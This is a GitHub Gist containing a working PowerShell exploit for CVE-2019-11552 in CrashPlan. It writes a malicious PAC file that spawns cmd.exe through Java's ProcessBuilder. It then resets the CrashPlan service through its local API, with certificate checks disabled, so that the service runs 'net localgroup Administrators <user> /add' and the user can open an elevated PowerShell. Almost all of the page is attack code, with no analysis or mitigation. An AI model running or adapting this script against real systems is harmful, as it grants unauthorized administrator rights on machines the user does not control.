Last active
February 17, 2021 18:54
-
-
Save bordplate/6f167c06c5325a7a87c24a8242f6e651 to your computer and use it in GitHub Desktop.
Exploit code for CVE-2019-11552. Adds current user to the local administrators group.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Create-FakePAC | |
| { | |
| Param( | |
| [String]$Command | |
| ) | |
| $fileContents = @" | |
| function FindProxyForURL(url, host) { | |
| new java.lang.ProcessBuilder["(java.lang.String[])"](["cmd.exe"], ["/c \"${Command}\""]).start(); | |
| return "DIRECT"; | |
| } | |
| "@ | |
| $fileContents | Out-File -FilePath "C:\ProgramData\CrashPlan\conf\service.pac" -Encoding ascii | |
| } | |
| function Reset-CrashPlanService { | |
| [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
| (New-Object Net.WebClient).DownloadString("https://127.0.0.1:4244/v1/ResetService") | |
| } | |
| $command = "net localgroup Administrators $env:UserName /add" | |
| try { | |
| Write-Host "[*] Creating PAC file..." | |
| Create-FakePAC -Command $command | |
| } catch [System.UnauthorizedAccessException] { | |
| Write-Host "[-] PAC-file might already exist. Resetting service to delete existing file and trying again..." | |
| $resetResult = Reset-CrashPlanService | |
| if ($resetResult -ne '{"errors":[]}') { | |
| Write-Host "[-] Could not reset CrashPlanService! Exiting." | |
| exit | |
| } | |
| Write-Host "[+] Service reset." | |
| Write-Host "[*] Trying to create PAC file again..." | |
| try { | |
| Create-FakePAC -Command $command | |
| } catch [System.UnauthorizedAccessException] { | |
| Write-Host "Giving up." | |
| exit | |
| } | |
| } | |
| Write-Host "[+] PAC-file created!" | |
| Write-Host "[*] Resetting CrashPlanService" | |
| $resetResult = Reset-CrashPlanService | |
| if ($resetResult -ne '{"errors":[]}') { | |
| Write-Host "[-] Could not reset CrashPlanService! Exiting." | |
| exit | |
| } | |
| Write-Host "[+] CrashPlanService reset! Attempting to start elevated Powershell session..." | |
| Create-FakePAC -Command $command | |
| Start-Sleep -Seconds 5 | |
| powershell -noexit -command "Start-Process powershell.exe -Verb runas" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment